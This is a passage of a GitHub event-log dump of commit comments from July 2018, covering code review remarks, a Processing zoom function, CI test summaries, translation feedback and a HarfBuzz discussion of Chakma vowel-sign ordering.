{"id":"8040793398","type":"CommitCommentEvent","actor":{"login":"memononen"},"repo":{"name":"Pomax/processing-bezier-master"},"payload":{"comment":{"id":29895358,"position":null,"line":null,"path":null,"commit_id":"0f8b5c64fa20cd7fefa859ed9f38f8dc48aab68c","created_at":"2018-07-30T23:09:32Z","updated_at":"2018-07-30T23:09:32Z","author_association":"NONE","body":"This should do it.\r\n\r\n```\r\nvoid mouseWheel(MouseEvent event) {\r\n\r\n  float step = event.getCount();\r\n\r\n  float zoom = 1.1;\r\n\r\n  float zoomCenterX = mouseX/SCALE + ROX; // view to canvas\r\n  float zoomCenterY = mouseY/SCALE + ROY;\r\n\r\n  if (step > 0.0)\r\n  {\r\n    float zoomFactor = pow(zoom, step);\r\n    float moveFactor = zoomFactor - 1.0;\r\n    SCALE *= zoomFactor;\r\n    ROX += (ROX - zoomCenterX) * (moveFactor / zoomFactor);    \r\n    ROY += (ROY - zoomCenterY) * (moveFactor / zoomFactor);    \r\n  }\r\n  else if (step < 0.0)\r\n  {\r\n    float zoomFactor = pow(zoom, -step);\r\n    float moveFactor = zoomFactor - 1.0;\r\n    SCALE /= zoomFactor;\r\n    ROX -= (ROX - zoomCenterX) * moveFactor;    \r\n    ROY -= (ROY - zoomCenterY) * moveFactor;    \r\n  }\r\n  redraw();\r\n}\r\n```\r\n\r\nThis changed was necessary in Bezier.pde, to make ROX/ROY be offset in canvas/world coordinates, not a pixel offset:\r\n```\r\n  scale(SCALE);\r\n  translate(ROX, ROY);\r\n```\r\n\r\nReasoning about when to use canvas/world vs view/pixel offset is kinda complicated. Most often view transform is easier to deal with in canvas/world, but you may end up either way if the need to just move things around arises organically.\r\n\r\nMac seems to send a lot of event.getCount() == 0 events, so it's important to handle them correctly too."}},"created_at":"2018-07-30T23:09:32Z"}
{"id":"8040801220","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29895380,"position":null,"line":null,"path":null,"commit_id":"c0620268f2b59bb63959f73478091938ad0eee0b","created_at":"2018-07-30T23:11:57Z","updated_at":"2018-07-30T23:11:57Z","author_association":"COLLABORATOR","body":"Does this actually work if individual start channels is selected?   This seems to now ignore any individual start channels that might be set and only relies on ChannelsPerString which would not apply in that case.\r\n"}},"created_at":"2018-07-30T23:11:57Z"}
{"id":"8040802212","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895381,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:12:17Z","updated_at":"2018-07-30T23:12:17Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:12:17Z"}
{"id":"8040805758","type":"CommitCommentEvent","actor":{"login":"mimoduo"},"repo":{"name":"Fastspot/Boilerplate"},"payload":{"comment":{"id":29895390,"position":null,"line":null,"path":null,"commit_id":"9dbe32d297a58cc3425b94ffb90ea94370bfa7a9","created_at":"2018-07-30T23:13:21Z","updated_at":"2018-07-30T23:13:21Z","author_association":"COLLABORATOR","body":"It only worked if you had a fall back which I never put in so I just made it select the first pair in the object"}},"created_at":"2018-07-30T23:13:21Z"}
{"id":"8040807354","type":"CommitCommentEvent","actor":{"login":"imanti"},"repo":{"name":"imanti/openlldp"},"payload":{"comment":{"id":29895395,"position":null,"line":null,"path":null,"commit_id":"cebd5e4b443ea762f5849982635f0ba4181af6ba","created_at":"2018-07-30T23:13:50Z","updated_at":"2018-07-30T23:13:50Z","author_association":"OWNER","body":"When running as daemon, syslog prints blanks' ASCII value as characters."}},"created_at":"2018-07-30T23:13:50Z"}
{"id":"8040817033","type":"CommitCommentEvent","actor":{"login":"jlesage"},"repo":{"name":"jlesage/docker-filebot"},"payload":{"comment":{"id":29895421,"position":23,"line":435,"path":"README.md","commit_id":"988e040dc1537f33677b6447acd3575e36fdad41","created_at":"2018-07-30T23:16:38Z","updated_at":"2018-07-30T23:16:38Z","author_association":"OWNER","body":"Ok I will adjust."}},"created_at":"2018-07-30T23:16:38Z"}
{"id":"8040817484","type":"CommitCommentEvent","actor":{"login":"Ionitron"},"repo":{"name":"ionic-team/ionic-cli"},"payload":{"comment":{"id":29895427,"position":null,"line":null,"path":null,"commit_id":"9b650a039b50d09d04e5738fcd3d6e8d8fc2d6fc","created_at":"2018-07-30T23:16:47Z","updated_at":"2018-07-30T23:16:47Z","author_association":"CONTRIBUTOR","body":"👀 "}},"created_at":"2018-07-30T23:16:47Z"}
{"id":"8040852738","type":"CommitCommentEvent","actor":{"login":"aj-th"},"repo":{"name":"aj-th/largefile-json"},"payload":{"comment":{"id":29895517,"position":null,"line":null,"path":null,"commit_id":"257ac06f5082e77a950b3e678a8cba7ebabd25d2","created_at":"2018-07-30T23:27:59Z","updated_at":"2018-07-30T23:27:59Z","author_association":"OWNER","body":"This is the license file for this project."}},"created_at":"2018-07-30T23:27:59Z"}
{"id":"8040855398","type":"CommitCommentEvent","actor":{"login":"jason2960"},"repo":{"name":"lucy201703/TranslatingForWriting"},"payload":{"comment":{"id":29895520,"position":6,"line":5,"path":"201805-Classic-Style/ch9/BookCommentsPartTwo&AuthorIntro.md","commit_id":"9d5befed403d8fd7297293b7e72b3136b9e1e863","created_at":"2018-07-30T23:28:49Z","updated_at":"2018-07-30T23:28:49Z","author_association":"NONE","body":"翻译2和翻译3，有同样的问题，意思过于绝对，和其它书比较的意味太浓了，阅读的感受不好"}},"created_at":"2018-07-30T23:28:49Z"}
{"id":"8040855652","type":"CommitCommentEvent","actor":{"login":"mdlincoln"},"repo":{"name":"programminghistorian/jekyll"},"payload":{"comment":{"id":29895521,"position":null,"line":null,"path":null,"commit_id":"b5d04bd37120b008259aec13c1f6cbd29ece2f11","created_at":"2018-07-30T23:28:54Z","updated_at":"2018-07-30T23:28:54Z","author_association":"MEMBER","body":"@spapastamkou ah, yes: please change the `redirect_from` to read `original`"}},"created_at":"2018-07-30T23:28:54Z"}
{"id":"8040856947","type":"CommitCommentEvent","actor":{"login":"SongsBot"},"repo":{"name":"imomarksasa/bot"},"payload":{"comment":{"id":29895524,"position":null,"line":null,"path":null,"commit_id":"4b4b6bfd9e46187cb33df5245fbe3e8e959c1740","created_at":"2018-07-30T23:29:19Z","updated_at":"2018-07-30T23:29:19Z","author_association":"NONE","body":"."}},"created_at":"2018-07-30T23:29:19Z"}
{"id":"8040860226","type":"CommitCommentEvent","actor":{"login":"aliga91"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29895533,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T23:30:23Z","updated_at":"2018-07-30T23:30:23Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-30T23:30:23Z"}
{"id":"8040865424","type":"CommitCommentEvent","actor":{"login":"jlesage"},"repo":{"name":"jlesage/docker-filebot"},"payload":{"comment":{"id":29895547,"position":33,"line":31,"path":"rootfs/opt/filebot/filebot","commit_id":"7c3d1c27b2b0039a32e7807f6bf6543f999f34dd","created_at":"2018-07-30T23:32:03Z","updated_at":"2018-07-30T23:32:03Z","author_association":"OWNER","body":"Perfect I will change it."}},"created_at":"2018-07-30T23:32:03Z"}
{"id":"8040866995","type":"CommitCommentEvent","actor":{"login":"JrSousaJ"},"repo":{"name":"JrSousaJ/ccomp"},"payload":{"comment":{"id":29895552,"position":null,"line":null,"path":null,"commit_id":"e26d5c8b395342ba03c86af3332a014b93970993","created_at":"2018-07-30T23:32:33Z","updated_at":"2018-07-30T23:32:33Z","author_association":"OWNER","body":"List of pointer exercises "}},"created_at":"2018-07-30T23:32:33Z"}
{"id":"8040867331","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29895554,"position":null,"line":null,"path":null,"commit_id":"091fb933531447af38a2b6d8b165f377540665f8","created_at":"2018-07-30T23:32:40Z","updated_at":"2018-07-30T23:32:40Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/091fb933531447af38a2b6d8b165f377540665f8)\n\nBuilt at __20180730 - 23:32:37__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 563s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 844s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 929s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 276s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 595s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 289s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 569s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 399s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 772s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 420s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1205s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 290s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 293s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 401s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 263s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 541s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/2//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 786s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-30T23:32:40Z"}
{"id":"8040870197","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29895565,"position":null,"line":null,"path":null,"commit_id":"6581f83a69f3fa5506a29dfc7a32f40bda084eda","created_at":"2018-07-30T23:33:35Z","updated_at":"2018-07-30T23:33:35Z","author_association":"COLLABORATOR","body":"<h3>[Core] Add panel stack component (#2642)</h3>\n\nPreview: <strong><a href='https://19302-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19302-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19302-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-30T23:33:35Z"}
{"id":"8040874698","type":"CommitCommentEvent","actor":{"login":"dzuelke"},"repo":{"name":"bukka/fpmi"},"payload":{"comment":{"id":29895572,"position":12,"line":165,"path":"fpmi/fpmi_stdio.c","commit_id":"912c9f0341ceece39d7cbd12fecdf60f34d1361a","created_at":"2018-07-30T23:35:03Z","updated_at":"2018-07-30T23:35:03Z","author_association":"NONE","body":"Will this suffix then not still be set on the next iteration even if the pipe is then not closed? Or does that not matter?"}},"created_at":"2018-07-30T23:35:03Z"}
{"id":"8040875030","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29895574,"position":3,"line":14,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"67ce7c33da96f8741ddb26ee0d39689c05989770","created_at":"2018-07-30T23:35:10Z","updated_at":"2018-07-30T23:35:10Z","author_association":"OWNER","body":"@TomRust Should we define these things in the comment:\r\nLine 4 - \"equilibrium value\"\r\nLine 13 -  depends \"baseline number of appointments offered\" Is this really the 75% of visits completed in the team?"}},"created_at":"2018-07-30T23:35:10Z"}
{"id":"8040879836","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29895589,"position":16,"line":31,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"67ce7c33da96f8741ddb26ee0d39689c05989770","created_at":"2018-07-30T23:36:44Z","updated_at":"2018-07-30T23:36:44Z","author_association":"OWNER","body":"@TomRust Can we define\r\nLine 35 to 36 - \"new patient waiting list' What does this mean?"}},"created_at":"2018-07-30T23:36:44Z"}
{"id":"8040887417","type":"CommitCommentEvent","actor":{"login":"jfgrissom"},"repo":{"name":"SneakyFish5/moneyd-uplink-xrp"},"payload":{"comment":{"id":29895610,"position":25,"line":273,"path":"index.js","commit_id":"6648ca1667cce7ec89d25ad8385ed7434f606ba1","created_at":"2018-07-30T23:39:10Z","updated_at":"2018-07-30T23:39:10Z","author_association":"NONE","body":"I see you have another PR for that piece. Makes sense.\r\n"}},"created_at":"2018-07-30T23:39:10Z"}
{"id":"8040890732","type":"CommitCommentEvent","actor":{"login":"dancondo"},"repo":{"name":"dancondo/rails-marketplace"},"payload":{"comment":{"id":29895622,"position":null,"line":null,"path":null,"commit_id":"776d1e5243521fff2375bd26976d3ec0226c90ec","created_at":"2018-07-30T23:40:14Z","updated_at":"2018-07-30T23:40:14Z","author_association":"OWNER","body":"Show!"}},"created_at":"2018-07-30T23:40:14Z"}
{"id":"8040894355","type":"CommitCommentEvent","actor":{"login":"jason2960"},"repo":{"name":"lucy201703/TranslatingForWriting"},"payload":{"comment":{"id":29895633,"position":33,"line":28,"path":"201805-Classic-Style/ch9/BookCommentsPartTwo&AuthorIntro.md","commit_id":"9d5befed403d8fd7297293b7e72b3136b9e1e863","created_at":"2018-07-30T23:41:21Z","updated_at":"2018-07-30T23:41:21Z","author_association":"NONE","body":"《古典风格》完全可以胜任自己的承诺：提升国民的写作水平。从一开始，托马斯和特纳将俘获一批有文化修养的非学术读者；在后面精彩的逐篇分析中，他们**也**将俘获其余大部分读者。书中中肯意见和远见卓识俯拾皆是。 "}},"created_at":"2018-07-30T23:41:21Z"}
{"id":"8040895827","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895635,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:41:48Z","updated_at":"2018-07-30T23:41:48Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:41:48Z"}
{"id":"8040905305","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895665,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:45:04Z","updated_at":"2018-07-30T23:45:04Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:45:04Z"}
{"id":"8040905514","type":"CommitCommentEvent","actor":{"login":"steelbrain"},"repo":{"name":"zo0r/react-native-push-notification"},"payload":{"comment":{"id":29895667,"position":null,"line":null,"path":null,"commit_id":"1c6d7b0e10756c17ac16f51abb0fd6f6803e8770","created_at":"2018-07-30T23:45:08Z","updated_at":"2018-07-30T23:45:08Z","author_association":"NONE","body":"I can't find this version on npm, any ideas when this will be released?"}},"created_at":"2018-07-30T23:45:08Z"}
{"id":"8040906135","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29895671,"position":80,"line":90,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"4d1fdeb4da28088e9327abbfdfbe1eb2824b4f3d","created_at":"2018-07-30T23:45:20Z","updated_at":"2018-07-30T23:45:20Z","author_association":"OWNER","body":"@TomRust Can we define Line 90-91 - \"initialization?\""}},"created_at":"2018-07-30T23:45:20Z"}
{"id":"8040907115","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895679,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:45:42Z","updated_at":"2018-07-30T23:45:42Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:45:42Z"}
{"id":"8040907451","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29895680,"position":70,"line":73,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"4d1fdeb4da28088e9327abbfdfbe1eb2824b4f3d","created_at":"2018-07-30T23:45:49Z","updated_at":"2018-07-30T23:45:49Z","author_association":"OWNER","body":"@TomRust Can we define line 79-80 - \"Endogenously generated.\"\r\n"}},"created_at":"2018-07-30T23:45:49Z"}
{"id":"8040907924","type":"CommitCommentEvent","actor":{"login":"wljgithub"},"repo":{"name":"wljgithub/GO-NOTES"},"payload":{"comment":{"id":29895684,"position":null,"line":null,"path":null,"commit_id":"e7e645131d9c814c7dc3c3e579990ab6be67d0e8","created_at":"2018-07-30T23:45:59Z","updated_at":"2018-07-30T23:45:59Z","author_association":"OWNER","body":"aaaaa"}},"created_at":"2018-07-30T23:45:59Z"}
{"id":"8040908163","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29895686,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T23:46:05Z","updated_at":"2018-07-30T23:46:05Z","author_association":"MEMBER","body":"@flyinghead I have figured out what makes it crash. \r\n\r\nSetting settings.aica.NoBatch = 1 when DSP is enabled will make it crash at startup for Reicast OIT, but not for Reicast non-OIT. Any further ideas?"}},"created_at":"2018-07-30T23:46:05Z"}
{"id":"8040909068","type":"CommitCommentEvent","actor":{"login":"lzim"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29895688,"position":68,"line":71,"path":"model_workgroup/models/cc_v34_2018_06_19_lzedits_2018_07_30f.mdl","commit_id":"4d1fdeb4da28088e9327abbfdfbe1eb2824b4f3d","created_at":"2018-07-30T23:46:23Z","updated_at":"2018-07-30T23:46:23Z","author_association":"OWNER","body":"@TomRust Line 71-72 - Can we define \"equilibrium?\""}},"created_at":"2018-07-30T23:46:23Z"}
{"id":"8040909801","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895690,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:46:39Z","updated_at":"2018-07-30T23:46:39Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:46:39Z"}
{"id":"8040911442","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895694,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:47:15Z","updated_at":"2018-07-30T23:47:15Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:47:15Z"}
{"id":"8040914434","type":"CommitCommentEvent","actor":{"login":"dongzhuoer"},"repo":{"name":"jrnold/r4ds-exercise-solutions"},"payload":{"comment":{"id":29895711,"position":null,"line":null,"path":null,"commit_id":"054306d7439759112473ddab4248014bd267896b","created_at":"2018-07-30T23:48:23Z","updated_at":"2018-07-30T23:48:23Z","author_association":"CONTRIBUTOR","body":"You should say 'see #46'"}},"created_at":"2018-07-30T23:48:23Z"}
{"id":"8040915545","type":"CommitCommentEvent","actor":{"login":"PCrnjak"},"repo":{"name":"PCrnjak/Led-Cube"},"payload":{"comment":{"id":29895714,"position":null,"line":null,"path":null,"commit_id":"0e0d6bf646a8ff9d342290f6dd5bf22c00767cbc","created_at":"2018-07-30T23:48:48Z","updated_at":"2018-07-30T23:48:48Z","author_association":"OWNER","body":"GRBL files"}},"created_at":"2018-07-30T23:48:48Z"}
{"id":"8040915996","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895717,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:48:57Z","updated_at":"2018-07-30T23:48:57Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:48:57Z"}
{"id":"8040916706","type":"CommitCommentEvent","actor":{"login":"marshallmcdonnell"},"repo":{"name":"marshallmcdonnell/lammps_widom_insertion"},"payload":{"comment":{"id":29895719,"position":null,"line":null,"path":null,"commit_id":"752f42a4529484659b99638d7d25304ea4a810dc","created_at":"2018-07-30T23:49:10Z","updated_at":"2018-07-30T23:49:10Z","author_association":"OWNER","body":"mcdonnellmt@ornl.gov\r\n\r\nIt is on my github page as well."}},"created_at":"2018-07-30T23:49:10Z"}
{"id":"8040917030","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29895721,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T23:49:14Z","updated_at":"2018-07-30T23:49:14Z","author_association":"NONE","body":"r/https://t.me/rate3_honey_bot?start=HP7U4P\n\nOn Mon, Jul 30, 2018 at 7:30 PM, aliga91 <notifications@github.com> wrote:\n\n> ok\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29895533>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am4jXVRjmwecxNFkpd5dcpMO6oK-pOWdks5uL5cngaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-30T23:49:14Z"}
{"id":"8040918087","type":"CommitCommentEvent","actor":{"login":"jason2960"},"repo":{"name":"lucy201703/TranslatingForWriting"},"payload":{"comment":{"id":29895726,"position":73,"line":78,"path":"201805-Classic-Style/ch9/BookCommentsPartTwo&AuthorIntro.md","commit_id":"9d5befed403d8fd7297293b7e72b3136b9e1e863","created_at":"2018-07-30T23:49:39Z","updated_at":"2018-07-30T23:49:39Z","author_association":"NONE","body":"如何普及概念组织的具体方式  \r\n这句从翻译上讲没问题，但是读者都不懂，也可能是缺乏这个领域的常识。至少我不知道**概念组织的具体方式**是什么意思。"}},"created_at":"2018-07-30T23:49:39Z"}
{"id":"8040920970","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29895739,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T23:50:42Z","updated_at":"2018-07-30T23:50:42Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T23:50:42Z"}
{"id":"8040921155","type":"CommitCommentEvent","actor":{"login":"disaderp"},"repo":{"name":"disaderp/automatic-chainsaw"},"payload":{"comment":{"id":29895740,"position":null,"line":null,"path":null,"commit_id":"fdedfb6b1dda3aa1ed1e22a163bc3e64d3083597","created_at":"2018-07-30T23:50:46Z","updated_at":"2018-07-30T23:50:46Z","author_association":"OWNER","body":"closes #31 "}},"created_at":"2018-07-30T23:50:46Z"}
{"id":"8040923032","type":"CommitCommentEvent","actor":{"login":"dscorbett"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29895748,"position":null,"line":null,"path":null,"commit_id":"62fa7cd1ccff4d4448ef84f9cc146464672636aa","created_at":"2018-07-30T23:51:27Z","updated_at":"2018-07-30T23:51:27Z","author_association":"CONTRIBUTOR","body":"I have investigated corpora-ccp. The texts order vowel signs haphazardly. If it is representative of Unicode-encoded Chakma, then if HarfBuzz enforces any order, including USE’s order, most text will get dotted circles. I nevertheless think it is a good idea to use a consistent order.\r\n\r\nHere is the set of sequences of multiple vowel signs by descending frequency. I have prepended each with U+11107 CHAKMA LETTER KAA for legibility.\r\n>4263 𑄇𑄬𑄭 e ai\r\n2643 𑄇𑄧𑄱 a o-mark\r\n1711 𑄇𑄰𑄱 oi o-mark\r\n1022 𑄇𑄭𑄪 ai u\r\n68 𑄇𑄧𑄲 a au-mark\r\n52 𑄇𑄭𑄮 ai o\r\n43 𑄇𑄧𑄧 a a\r\n32 𑄇𑄧𑄭 a ai\r\n27 𑄇𑄬𑄬 e e\r\n18 𑄇𑄧𑄧𑄲 a a au-mark\r\n16 𑄇𑄨𑄨 i i\r\n13 𑄇𑄪𑄪 u u\r\n8 𑄇𑄭𑄧 ai a\r\n8 𑄇𑄨𑄬 i e\r\n7 𑄇𑄮 o-mark a\r\n6 𑄇𑄮𑄮 o o\r\n6 𑄇𑄬𑄧 e a\r\n5 𑄇𑄬𑄪 e u\r\n4 𑄇𑄧𑄧𑄱 a a o-mark\r\n3 𑄇𑄨𑄪 i u\r\n2 𑄇𑄰𑄮 oi o-mark a\r\n2 𑄇𑄮𑄰𑄱 o oi o-mark\r\n2 𑄇𑄬𑄭𑄭 e ai ai\r\n2 𑄇𑄬𑄨 e i\r\n2 𑄇𑄬𑄧𑄭 e a ai\r\n2 𑄇𑄨𑄩 i ii\r\n1 𑄇𑄰𑄱𑄭 oi o-mark ai\r\n1 𑄇𑄮𑄮𑄮𑄮 o o o o\r\n1 𑄇𑄮𑄧 o a\r\n1 𑄇𑄭𑄫 ai uu\r\n1 𑄇𑄬𑄮 e o\r\n1 𑄇𑄫𑄭 uu ai\r\n1 𑄇𑄪𑄬 u e\r\n1 𑄇𑄪𑄧𑄭 u a ai\r\n1 𑄇𑄪𑄧 u a\r\n1 𑄇𑄩𑄨 ii i\r\n1 𑄇𑄧𑄮 a o-mark a\r\n\r\nThe order of vowel signs is inconsistent. Most of these seem to be typos. There are many instances of duplicated vowel signs, which in non-USE fonts overstrike each other and are therefore not apparent. The combination of <i>a</i> and <i>ai</i> might be a typo for <i>ai</i> or <i>oi</i>.\r\n\r\n@Bivuti, which sequences are intentional, and what is their most natural typing order? Are there any combinations not attested in this corpus? Based on the frequencies, it looks like the preferred order is left–top–bottom, but U+1112E is very common and decomposes into bottom+top. I therefore propose that U+11127 CHAKMA VOWEL SIGN A be overridden to VPst and that the rest of the vowel signs follow Unicode’s categorization, resulting in an order of left–top–bottom–<i>a</i>. (It would be better to order them as left–top–<i>o</i>/<i>au</i> mark–<i>a</i>–bottom, but 